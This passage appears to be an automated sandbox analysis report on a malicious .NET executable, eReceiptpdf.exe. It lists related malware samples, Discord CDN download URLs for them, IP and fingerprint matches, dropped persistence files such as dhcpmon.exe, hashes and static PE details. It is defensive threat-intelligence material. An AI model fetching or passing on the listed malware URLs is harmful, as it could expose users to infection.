	xuTyOmef1g.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/878382243242983437/879113244856430592/Microsoft.exe
	VMKwliCGEP.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/785611664095313920/785649743954706472/bin.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	FWWg6C0DM4.exe	Get hash	malicious	Browse	162.159.133.233
	PmX6Qcb1OH.exe	Get hash	malicious	Browse	162.159.135.233
	payment.exe	Get hash	malicious	Browse	162.159.134.233
	ValorantLogin.exe	Get hash	malicious	Browse	162.159.134.233
	WPFRegisterStudent.exe	Get hash	malicious	Browse	162.159.133.233
	PI 210907-06.doc	Get hash	malicious	Browse	162.159.135.233
	cx6hZvW5HV.exe	Get hash	malicious	Browse	162.159.133.233
	vergi #U00f6demesi dekontu 26.10.2021,pdf.vbs	Get hash	malicious	Browse	162.159.130.233
	6iUUqpBnNi.exe	Get hash	malicious	Browse	162.159.129.233
	wnS9iqUWXu.exe	Get hash	malicious	Browse	162.159.129.233
	p9Ts9VV2NZ.exe	Get hash	malicious	Browse	162.159.129.233
	x6d8L7ju1g.exe	Get hash	malicious	Browse	162.159.134.233
	SfFC2cykMw.exe	Get hash	malicious	Browse	162.159.129.233
	0L3hPPGkT5.exe	Get hash	malicious	Browse	162.159.130.233
	2LM4yR5arf.exe	Get hash	malicious	Browse	162.159.134.233
	Hesap hareketleriniz.PDF.exe	Get hash	malicious	Browse	162.159.130.233
	DHL.Shipment1.xla	Get hash	malicious	Browse	162.159.135.233
	open this if the doesn't work.exe	Get hash	malicious	Browse	162.159.134.233
	DHL.Shipment1.xla	Get hash	malicious	Browse	162.159.130.233
	PAYMENT-SWIFTCOPY.exe	Get hash	malicious	Browse	162.159.130.233

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	ATT51656.htm	Get hash	malicious	Browse	104.16.126.175
	FWWg6C0DM4.exe	Get hash	malicious	Browse	162.159.133.233
	DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exe	Get hash	malicious	Browse	162.159.130.233
	PmX6Qcb1OH.exe	Get hash	malicious	Browse	162.159.135.233
	p3IJWYfJZw.exe	Get hash	malicious	Browse	172.67.133.215
	allegato.html	Get hash	malicious	Browse	104.16.18.94
	payment.exe	Get hash	malicious	Browse	162.159.134.233
	privatebotavtobus-by_249764151.exe	Get hash	malicious	Browse	172.67.177.45
	PAGOS PENDIENTES XT3503.exe	Get hash	malicious	Browse	172.67.135.253
	agent.exe	Get hash	malicious	Browse	104.21.85.99
	RIVERSEDGE #PO, INVOICE Acknowledge & E- Check Remittance Advice - Copy.html	Get hash	malicious	Browse	104.16.126.175
	ValorantLogin.exe	Get hash	malicious	Browse	162.159.134.233
	WPFRegisterStudent.exe	Get hash	malicious	Browse	162.159.133.233
	Wynndevelopment-HTML.HTML	Get hash	malicious	Browse	104.16.19.94
	VIEW DOCUMENT.html	Get hash	malicious	Browse	104.16.18.94
	Bi4P9gzPgEuPau5wQ3n3.exe	Get hash	malicious	Browse	104.21.19.200
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	104.21.19.200
	PO_SBK4128332S.exe	Get hash	malicious	Browse	104.21.19.200
	PI 210907-06.doc	Get hash	malicious	Browse	162.159.135.233
	RFQ for _RTO system packages product details.doc	Get hash	malicious	Browse	104.21.86.112
DEDIPATH-LLCUS	DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exe	Get hash	malicious	Browse	45.133.1.182
	p3IJWYfJZw.exe	Get hash	malicious	Browse	45.133.1.107
	6177fc626d11c.dll	Get hash	malicious	Browse	45.9.20.174
	H5JRlcB50Q.dll	Get hash	malicious	Browse	45.9.20.174
	tHrRhSpGRy.dll	Get hash	malicious	Browse	45.9.20.174
	qQesBb5jg2.dll	Get hash	malicious	Browse	45.9.20.174
	Swit_copy.exe	Get hash	malicious	Browse	45.128.48.160
	IMG20039010262021_Odeme.exe	Get hash	malicious	Browse	45.133.1.84
	6FD5C640F4C1E434978FDC59A8EC191134B7155217C84.exe	Get hash	malicious	Browse	45.133.1.107
	setup_x86_x64_install.exe	Get hash	malicious	Browse	45.133.1.107
	7lXaD31nA4.exe	Get hash	malicious	Browse	45.9.20.182
	UaHZIE4Jxg.exe	Get hash	malicious	Browse	45.9.20.149
	x1hQGADdLZ.exe	Get hash	malicious	Browse	45.9.20.182
	960.dll	Get hash	malicious	Browse	45.9.20.174
	h0vmra5UH0.exe	Get hash	malicious	Browse	45.9.20.182
	6eFSUWcX1F.exe	Get hash	malicious	Browse	45.9.20.149
	0OeX2BsbUo.exe	Get hash	malicious	Browse	45.133.1.107
	AB948F038175411DC326A1AAD83DF48D6B65632501551.exe	Get hash	malicious	Browse	45.133.1.182
	FC2E04D392AB5E508FDF6C90CE456BFD0AF6DEF1F10A2.exe	Get hash	malicious	Browse	45.133.1.107
	29669b199ce94a9ee97f8955480b8e8f5b0ed8b38824f.exe	Get hash	malicious	Browse	45.9.20.149

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	FWWg6C0DM4.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	GU5kmLwV7r.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	payment.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	peSZa2MV75.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	ValorantLogin.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	WPFRegisterStudent.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	Bi4P9gzPgEuPau5wQ3n3.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	PO_SBK4128332S.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	NewOrderPDF.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	VUsEbEh3jG.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	cx6hZvW5HV.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	vergi #U00f6demesi dekontu 26.10.2021,pdf.vbs	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	6iUUqpBnNi.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	wnS9iqUWXu.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	p9Ts9VV2NZ.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	x6d8L7ju1g.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	SfFC2cykMw.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	0L3hPPGkT5.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233
	uuV301Pw71.exe	Get hash	malicious	Browse	162.159.129.233 162.159.134.233

Dropped Files

No context

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Download File
Process:	C:\Users\user\Desktop\eReceiptpdf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	182200
Entropy (8bit):	5.309905162463364
Encrypted:	false
SSDEEP:	3072:Mc7omjUjSljUDwSFxCCSQUMzTjSMzTjoIe1Uhkef:Mc7omnjUcSDCCSHBe
MD5:	C97F7F2DEA671626AB1C6D3D1AD59422
SHA1:	DE5BC22D6558A46F99784598F550A3AFFAB19ADA
SHA-256:	9B65DB8538653AB63132C23E45852D5455C9CC661655FA217B42A830B0EFD24C
SHA-512:	0C9FF6B31C925653C366B9D59A3DDB58A630C8130E6DF700216434C38E125663EBC8596CF830AEE5B45C31894F014C279AA94AACE44560BBC33FE0F2A5F89B08
Malicious:	true
Yara Hits:	Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
Antivirus:	Antivirus: ReversingLabs, Detection: 22%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.wa..............P.................. ........@.. ....................... .......f....@.....................................S.......(............................................................................ ............... ..H............text....... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B........................H............/......v....o...(..........................................M...Z...........................................................................................@...............................................................................................................................................................................................!...........L.......!...T...h...i...s... ...p...r...o...g...r...a...m... ...c...a...n...n...o...t... ...b...e... ...r...

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\eReceiptpdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_eReceiptpdf.exe_8b4f881e59df9de8ddc34724ddfe232be31bbe18_8b97a11e_18b17b1c\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1906782740485125
Encrypted:	false
SSDEEP:	192:NBxccqkzwCmHBUZMXyaKeCvVD//u7snS274It+:L7qkzwDBUZMXyaeZ//u7snX4It+
MD5:	5462F7C9E9CD7988EF92237CDCE1D0D0
SHA1:	8B87752C42D90C839976E493804F2E292CEC1A5B
SHA-256:	5069FE5323186C071568C54CDA13AB826882CA0C8B2EABAB23F1C70CC8E0A803
SHA-512:	1566C64F172B96F0F29723183FD5664FB305D1C97A19C9146AF0C50A5F856CC6081E1286FDE649FF08F6EC36F85F75F533155FC960CA8202C51C6703AE183728
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.8.0.2.6.0.2.7.8.2.9.7.6.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.8.0.2.6.0.7.8.2.9.8.3.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.a.f.a.5.a.5.-.e.a.3.9.-.4.5.6.4.-.a.b.f.b.-.3.5.6.7.a.d.6.e.d.a.4.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.d.f.2.7.f.5.-.0.1.1.c.-.4.8.a.7.-.9.f.b.c.-.a.8.b.a.6.c.c.b.2.4.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.e.R.e.c.e.i.p.t.p.d.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.a.y.r.o.l.l. .M.a.n.a.g.e.m.e.n.t. .S.y.s.t.e.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.4.-.0.0.0.1.-.0.0.1.c.-.f.3.2.a.-.d.e.d.4.1.9.c.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.f.1.5.c.9.b.a.8.6.f.2.d.b.2.d.9.f.1.9.a.3.3.e.5.4.0.4.4.0.c.b.0.0.0.0.0.0.0.0.!.0.0.0.0.d.e.5.b.c.2.2.d.6.5.5.8.a.4.6.f.9.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6061.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Oct 27 10:03:23 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	327799
Entropy (8bit):	3.668715040088311
Encrypted:	false
SSDEEP:	3072:xOG+ADhh9gIOgF5jSa0JbyUCgUkmTaY3d0X6wNjd+pConjDNioBgd:xXth9RpDzi2TjfTaOd0qwSpCZ
MD5:	B6B17EF01B8C0DABF6E740B350F847FF
SHA1:	31C1E3E22E4AD3F550ABF6305B36036678AE0056
SHA-256:	EB1B757EA7FEB56453AC4FA39D0BC509F0C70FE5BE2634DA08989A9BA917DA69
SHA-512:	86D729B140590970A4EDB91E83DACB6436DC9312CED934F40F8F86B2CB596E9A3F7DA0E3495EF737EC15C8291BB74E7C5648A5E2B9EE1662880B53960763C155
Malicious:	false
Reputation:	low
Preview:	MDMP....... ........#ya....................................T....)......$1..\b..........`.......8...........T............V..w............)...........+...................................................................U...........B......h,......GenuineIntelW...........T............#ya.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER692C.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8408
Entropy (8bit):	3.689651747888066
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiqY6byC6YFGSU94gmfZlS0CprU89b6LsfNem:RrlsNiN6+C6YkSU94gmfrS96Qft
MD5:	4686EA433BD678125ADD30FD1D755CE4
SHA1:	BA199A4949A2B24F5672DDD45B30F996BABED108
SHA-256:	55E3318CD87323BE03658B246F0F1A5898012229B3795E6CADFCDCFE0DA9EB07
SHA-512:	833A7FEC625EB8C9C386382138FFB196EF5483BAB0A711553B627C771D3AECBDB33A598A2D1EB989E39F918BC74111FC3616A230B079E2A99207CE2E1482A86D
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.2.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A84.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4775
Entropy (8bit):	4.4612256114671025
Encrypted:	false
SSDEEP:	48:cvIwSD8zs+JgtWI933WSC8B2z8fm8M4JLVNFFAC+q8v+VNJ3e6s0cCd:uITf0kGSNgQJpSCKO7ls0ld
MD5:	FE9BFA6D90B9F600EEEFD6EA6F327B00
SHA1:	74ACABA29A9F17F8B7EEC6EE7D5A3D63A9B6A827
SHA-256:	17AD7AB4985D30CF261A236D90D1A9538C422AE4933669BDEF62277C3F649FBC
SHA-512:	2EBDF82AEE9602400C8E2B36D8B1C361249A45BD2D1D6E1DF1B52A65E6EE541BBF48042C3953492F45B55EC396F1C3CCC8D3AE3F52F45ED9F5B54D9818720881
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1228034" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	5.365622957937216
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84jE4Ks:MxHKXwYHKhQnoPtHoxHhAHKzvKvjHKs
MD5:	AE8CFF33270358D6EC23793128B3EF2F
SHA1:	5E6B156157EDEA4222A5E0C258AE9ADEBB8CB7CE
SHA-256:	498EAB9F855E7CE9B812EAD41339A9475127F0C8E7249033B975071D2292220C
SHA-512:	473111AD332D5E66724AFB0CE5A1E1C97890D60484A818D1DB8C2386A99C05BAE6C9D5C535DDFB6790BF5707C153502B938BE201393A3D70342A62902E0A3C98
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat Download File
Process:	C:\Users\user\Desktop\eReceiptpdf.exe
File Type:	data
Category:	dropped
Size (bytes):	248
Entropy (8bit):	6.997351629001838
Encrypted:	false
SSDEEP:	6:X4LDAnybgCFcps0Oa706d+6zsThvr9ohWCsT9ZIWyq4B:X4LEnybgCF07hNgtr9oE/3oB
MD5:	EDB5F15385E111D1F43093F56149A3FB
SHA1:	D865A47A0997848D5D4005B857A3FD0027BCD3C6
SHA-256:	1995E579108E8EB3B6C00893E855E8204D1C36F150088736556B66BE445E7957
SHA-512:	C3C0ADA45BECD863F41369F766E719A6FDC7807096F17FAEFBA6466EBEE4830524046DAFB186E1DFB50B15B07F0877ECD3B4E5993B83E8D67FF5A68D4F2ACCFE
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*.............S.Ty.K.&....q$.7....."....F... .N.k.C.X.D.^.....u.\...X........s^.;...m/.,7X..v"B..#.T.F L...h.....t 5.\|Z

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Users\user\Desktop\eReceiptpdf.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:S:S
MD5:	A0F35B4C1FE7C2E1A05921A9DAB32884
SHA1:	D063CCA8388E40753F6030A57BDADDB23CC17ACB
SHA-256:	4D04BF011BDBA17327EC086E7611C55DC409BF57B80C6B29B0C24ED6ADE72585
SHA-512:	0D937ABC51081EDA229EB5F24138945DBCEA6A9B9260F75320BDCD5BA968BDB910F054AEF9DA47E520D7D69F2729C1C334AC36BDA51790C6056274AD65E0DBF0
Malicious:	true
Preview:	._6.0..H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin Download File
Process:	C:\Users\user\Desktop\eReceiptpdf.exe
File Type:	data
Category:	modified
Size (bytes):	40
Entropy (8bit):	5.153055907333276
Encrypted:	false
SSDEEP:	3:9bzY6oRDT6P2bfVn1:RzWDT621
MD5:	4E5E92E2369688041CC82EF9650EDED2
SHA1:	15E44F2F3194EE232B44E9684163B6F66472C862
SHA-256:	F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
SHA-512:	1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
Malicious:	false
Preview:	9iH...}Z.4..f.~a........~.~.......3.U.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat Download File
Process:	C:\Users\user\Desktop\eReceiptpdf.exe
File Type:	data
Category:	dropped
Size (bytes):	330552
Entropy (8bit):	7.999418479033017
Encrypted:	true
SSDEEP:	6144:e+H5lVSPLgM+LiESqVzsh59rP3BcS8RlST0Hp0LXDLEyxgQO:eQ5HSPlESqVziLmSMlSi0LXDLfgQO
MD5:	4167AA6253824B81F8DAD83994B5E6C2
SHA1:	B269E4777C32C97BA8C17081720960272D84D3D8
SHA-256:	A526941778F055092275D2E6BAB2F65CB5D55F83B3CBCE66F15B260A2AC9D92B
SHA-512:	87FA9926E808EE50A726462EBCC26C0AAF99EAB6FEE18B19E8D5DFD2D4C6ED3D6B8191B8859AD324EC2AF579EEB42124116073B40DA3060AF5215526F5F6BAF1
Malicious:	false
Preview:	^.H.X8O......z.....@u].....}.... ...jr.M.6.....v.3P6...._.xh.ku..A.~..!..6N)R'.....u1!....5..F...C..Y.&.A.pd-..c.A.8`...\|.)@...r..`.;...UPM.......B...a.O.y....4..Z....?[..Et..:..`......k^?tR]..".lY....9..^M..VW.j...i.0-.....B.\|.PW....;mG.V...6&.<G..Ri.qo...I.`nW...Q.'.....xJ........f.. ..Oh/xt.k.1.c..496..[=.lA8.X.JM.a.......G.S"."3).C3.\J..3^..$d...k..m...R....0.@.>N.]...Zt.xKDF~....5...H.y...'#Q...h.cp...I.9'..@..u.0.9..ZY.[k...^..^a.=..1.P..8Y.r.Y..e...V..b!#o.r...kz..a..].~yU.A..hPx..U.U.x...;..xb.o.f..._q..-=...8.b......;..8R\|0i..........<....0i...}A..-.:#3..\.....-.../!..#rH..A.2.h.O..)`1..#.\..8.5.k..=,..;l........Mvk..h.......".e..y.I..Y...@.`.s?..c..p.).a..%.g;0....R.n...K.h.\z9..@p1..O...j3x.;>Z..........sy{.f.x..N.:..l...w.sPR....LN..-J><..'...3.j...".w'...9P0C.T..T..kK@.P]SmB<.~.......)h....J.U\|%..I...:_.3.y.........b..g..`.......Z......;.QM...A...:.....}...=).1..(.=4.O...}..8.r8....#.I_b*..D..&.....E.kH...B.

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.278108139589165
Encrypted:	false
SSDEEP:	12288:izNzYu8hJ1K8chSM525VSGmoX65h5B1H/Lfo2HH5oUY2n7zS90Bs2:iNzYu8hJ1K8chSkA
MD5:	A9E2F8F21ED07DE60F1E47187142AE80
SHA1:	691F8A27019476DEF32773CFDBB38179390CCBFD
SHA-256:	4A527CFF9B8485AB0E787A7DB400D4C44EB4CDDDB6C476A3C2CAE92328D74298
SHA-512:	14C5D81E8D57EE9DCE48E7846CFB8CE406F729FE96825D29C6673FE2C8EA57E5AE89B94EA56C3E1E7320EB6AC4ACF7D17B151AE7EC5BD9014F9F31DD7B044EEC
Malicious:	false
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.....................................................................................................................................................................................................................................................................................................................................................n..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	4.183754949213674
Encrypted:	false
SSDEEP:	768:m1ZdCWMwqh7rJFftx1eJ4X1FFf7gBqX7eq5QMVyi6aX4LXwuz+W2m:Xf7zIaiCRq1
MD5:	CC79734D7A447376082BBE005428051B
SHA1:	AFCDAED2F7EDC1ECAB0E9905933DFB0505D5CAE8
SHA-256:	098495EF3E46670A60243875BC13E5C91B2E40AD7D922CB86F7A6EF629B225F8
SHA-512:	2A39439E281EDFAB0B5BE90DC25B140951C15E25DF206DEE5A2521C9FB684A3419A8F4D00190B6BDE5590773469A448813745795EA29143DA1576EB4BB2059F7
Malicious:	false
Preview:	regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.....................................................................................................................................................................................................................................................................................................................................................n..HvLE.~......Y............[.l....C.............. ....... .......0................... ..hbin................p.\..,..........nk,..x..........@........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..x.......... ........................... .......Z.......................Root........lf......Root....nk ..x.......................}.............. ...............*...............DeviceCensus.......................vk..................WritePer

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.309905162463364
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	eReceiptpdf.exe
File size:	182200
MD5:	c97f7f2dea671626ab1c6d3d1ad59422
SHA1:	de5bc22d6558a46f99784598f550a3affab19ada
SHA256:	9b65db8538653ab63132c23e45852d5455c9cc661655fa217b42a830b0efd24c
SHA512:	0c9ff6b31c925653c366b9d59a3ddb58a630c8130e6df700216434c38e125663ebc8596cf830aee5b45c31894f014c279aa94aace44560bbc33fe0f2a5f89b08
SSDEEP:	3072:Mc7omjUjSljUDwSFxCCSQUMzTjSMzTjoIe1Uhkef:Mc7omnjUcSDCCSHBe
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.wa..............P.................. ........@.. ....................... .......f....@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x42c7de
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6177E630 [Tue Oct 26 11:27:44 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
